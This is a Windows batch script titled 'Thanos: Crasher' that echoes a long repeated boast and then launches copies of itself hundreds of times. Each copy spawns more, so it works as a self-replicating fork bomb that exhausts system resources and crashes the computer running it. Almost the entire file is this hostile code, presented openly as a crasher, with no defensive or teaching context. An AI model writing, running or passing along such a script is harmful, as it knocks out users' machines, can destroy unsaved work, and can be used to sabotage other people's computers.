@echo off & cls
mode 160,50
title Thanos: Crasher
:menu
type menu.py
color c

echo THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOPT HANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP THANOS CRASHER ON TOP 
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
